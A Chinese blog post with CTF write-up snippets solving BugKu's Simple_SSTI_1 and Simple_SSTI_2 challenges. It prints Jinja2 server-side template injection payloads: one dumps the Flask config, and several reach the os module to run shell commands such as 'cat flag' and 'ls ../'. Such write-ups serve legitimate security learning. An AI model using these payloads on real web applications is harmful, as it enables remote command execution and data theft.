【web | CTF】BugKu CTF Simple_SSTI_1 和 2

最新推荐文章于 2024-09-20 15:29:00 发布

星盾网安

最新推荐文章于 2024-09-20 15:29:00 发布

阅读量433

点赞数 8

分类专栏： CTF - Web 文章标签：安全 web安全

本文链接：https://blog.csdn.net/weixin_46301214/article/details/136213269

版权

CTF - Web 专栏收录该内容

15 篇文章 1 订阅

订阅专栏

天命：相信自己

一打开题目就告诉你输入flag参数，而且你输入什么就输出什么

输入：1 输出：1

很明显就是模板注入，Python的web框架独有的漏洞

那就简单，去查一下payload，一把梭

学习可以看这篇文章：https://www.cnblogs.com/tuzkizki/p/15394415.html

原理也不解释，就是拿poc一把梭

# flag在配置文件里
第一关是：flag={{config}}  

# 命令执行
第二关是：flag={{"".__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__import__('os').popen('cat%20flag').read()}}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

星盾网安

关注关注

8
点赞
踩
7

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

bugkuctf-Simple_SSTI_2

qq_51775369的博客

03-10

5464

bugku-ctf

Bugku [Simple_SSTI_2]（基于ctf题目学习SSTI服务器模板注入）

MAHRE_Z的博客

11-09

866

打开网址发现一串英文，提示“You need pass in a parameter named flag”（“您需要传入一个名为 flag 的参数”），根据题目提示SSTI，搜索一下SSTI，发现一篇文章介绍。显示为flag参数的值，可以知道页面会显示被传入flag参数的值，然后进行报错看一看网站使用的模板类型。不错，其中有讲到什么是注入，说是格式化字符串漏洞的一种体现，然后我就又找了一篇关于。发现目录，进入app目录,发现flag文件。用cat命令查看flag，得到flag。

参与评论您还未登录，请先登录后发表或查看评论

CTF学习第十二站——BugKu的Simple_SSTI_1和Simple_SSTI_2

qq_41174589的博客

10-13

143

只是将URL后加上/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}访问设置在URL后加上?flag={{config}}找到flag。结合题目确认为SSTI模板注入。题目提示需要上交flag。题目与第一题基本一致。

CTF学习之SSTI-tplmap

weixin_47726676的博客

04-20

2553

tplmap安装之旅查看虚拟机python版本为python2 从github下载tplmap git clone https://github.com/epinna/tplmap cd tplmap python tplmap.py 报如下错误 ImportError: No module named yaml 引入模块 pip install yaml 发现没有安装pip，于是安装setup-tools和pip wget https://pypi.python.org/packages/45/

Bugku：Simple_SSTI_2

热门推荐

qq_46230755的博客

03-10

1万+

我超喜欢这种题目的，确实对我这种萌新非常的友好打开后，题目提示存在模板注入先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹，进行一个个进入查看，运气很好，第一个看的app文件夹里就有flag ?flag={{%20config.__class__.__init__.__globals__[%27os%27].po

BUGKU-WEB Simple_SSTI_2

天泽岁月

02-06

591

BUGKU-WEB Simple_SSTI_2

BugKu CTF之 Simple_SSTI_2

weixin_42557264的博客

09-16

1923

进入场景和Simple_SSTI_1一样提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹，进入查看，先看看第一个，运气很好，第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.

Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2

记录笔记

04-22

949

Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题

Simple_SSTI_1

qq_47094508的博客

08-10

1304

到这里咋们可以开始爆破pin码然后继续去搜索jinja2+flask相关的知识(才发现这mac没有密码字典！点击访问，发现需要输入pin码才能进行操作，密码爆破先放一下，看一下能不能通过前端绕过。让服务器报错泄漏更多信息，方便整理思路，jinja2+flask。拿到题目直接直接目录爆破走一波，可以发现有一个控制台被爆出来了。按照模版注入的思路走的话，直接拼接代码就行,典型的模版注入特征。输入命令返回404，这不确定是成功了还是失败了,先放一放。而secret_key是flask里面一项重要的配置项。...

CTF之路：利用tplmap实现SSTI模板注入

zw05011的博客

01-08

3857

1.题目 SSTI -Simple2 提示了SSTI，提示了参数flag。显示这是一道以flag为参数的SSTI模板注入题目因此，使用模板注入工具tplmap来解题。 2.知识点 kali 下安装tplmap 1.安装kali下的python2的pip工具 kali2020版及以上，输入python2命令会执行python2， python3也存在。但pip默认是pip3，而我们需要的是pip2，所以我们需要先安装pip2 # 进入/home/kali目录 cd #下载pip2安装脚本 wge

bugkuctfweb题解simple_ssti_1

06-28

simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目，主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。这个题目中，使用者可以在输入框中输入任意字符串，然后后端会将这个字符...

API安全推荐厂商瑞数信息入选IDC《中国数据安全技术发展路线图》

科技云报道

09-20

317

本次IDC TechScape研究根据技术的市场影响以及各技术的发展阶段，将包括API安全在内的22个新兴及重要的数据安全技术分为变革型技术、增量型技术以及机会型技术三大类别，详细阐述每个单项数据安全技术的发展程度、技术优劣势，并给出IDC在不同技术领域下的产品推荐厂商名录。内置敏感信息检测引擎，覆盖姓名、手机号、身份证、银行卡、密码等18种敏感数据类型，对敏感信息进行自动分级，实时洞察API接口中双向传输的敏感数据、明文密码和弱密码，并及时对API接口回传报文中的敏感信息进行脱敏处理，规避数据泄漏风险。

【农信网-注册/登录安全分析报告】

09-16

1475

北京农信互联科技集团有限公司是一家农业互联网高科技企业，以“用互联网改变农业”为使命，致力于构建最有影响力的农业数智生态平台，推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业，技术实力也应该不错，但采用的还是老一代的图形验证码已经落伍了，用户体验一般，容易被破解，一旦被国际黑客发起攻击，将会对老百姓形成骚扰，影响声誉。很多人在短信服务刚开始建设的阶段，可能不会在安全方面考虑太多，理由有很多。比如：“需求这么赶，当然是先实现功能啊”，“业务量很小啦，系统就这么点人用，不怕的。

Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计

哦卷！

09-14

951

我发现很多文章包括教程，大概套路是：只说有漏洞的点，将有漏洞的点指出，然后分析代码；或者黑盒测试出漏洞之后，然后分析代码。我认为这是在分析漏洞代码，而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在，包括思路！所以这里不管有没有漏洞，我都会把审计过程写出来，因此篇幅会很长，但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。

企业如何构建有效的数据泄露防护安全体系

A526847的博客

09-14

794

在当今数字化时代，企业数据已成为核心资产，其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发，不仅会导致经济损失，还可能损害企业声誉和客户关系。因此，构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。

企业的终端安全该怎么防护？

shunyou0526的博客

09-14

771

该系统通过对终端上的敏感数据进行加密，确保只有经过授权的用户才能访问或读取数据，即使设备丢失或遭到入侵，数据也不会被轻易获取。此外，它还通过严格的访问控制和实时监控，限制未经授权的操作，防止数据被非法复制或传输。文件和磁盘加密：企业级加密软件会对存储在终端上的数据进行加密，包括文件、文件夹和整个磁盘，只有经过授权的用户才能访问这些数据。权限管理：通过基于角色的访问控制 (RBAC)，企业级加密软件可以确保只有特定人员能够访问特定的加密数据，防止未授权的访问。

活动目录安全